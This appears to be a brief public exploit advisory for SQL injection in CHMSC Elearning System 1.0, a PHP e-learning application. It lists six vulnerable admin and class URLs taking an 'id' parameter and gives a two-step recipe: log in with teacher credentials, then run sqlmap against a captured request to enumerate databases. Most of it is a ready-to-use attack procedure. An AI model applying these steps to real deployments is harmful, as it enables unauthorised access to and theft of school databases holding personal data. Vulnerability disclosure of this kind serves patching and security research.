CHMSC Elearning System version 1.0 suffers from a remote SQL injection vulnerability.
77f57674def23ab3a7057704c263a411
# Exploit Title: CHMSC Elearning System 1.0 - SQL Injection
# Exploit Author: Ferhat Çil
# Date: 2020-12-25
# Vendor Homepage:
https://www.sourcecodester.com/php/5172/responsive-e-learning-system.html
# Software Link:
https://www.sourcecodester.com/download-code?nid=5172&title=Responsive+E-Learning+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version : Version 1
# Tested on Ubuntu
Step 1. Log in to the application with teacher credentials.
Url addresses with sqli
- http://localhost/<folder>/class.php?id=7
- http://localhost/<folder>/admin/edit_teacher.php?id=1
- http://localhost/<folder>/admin/add_student.php?id=17
- http://localhost/<folder>/admin/add_course.php?id=5
- http://localhost/<folder>/admin/add_subject.php?id=5
- http://localhost/<folder>/admin/add_department.php?id=6
Step 2. Run sqlmap on the URL where the "id" parameter is given
sqlmap -r requestData.txt --dbs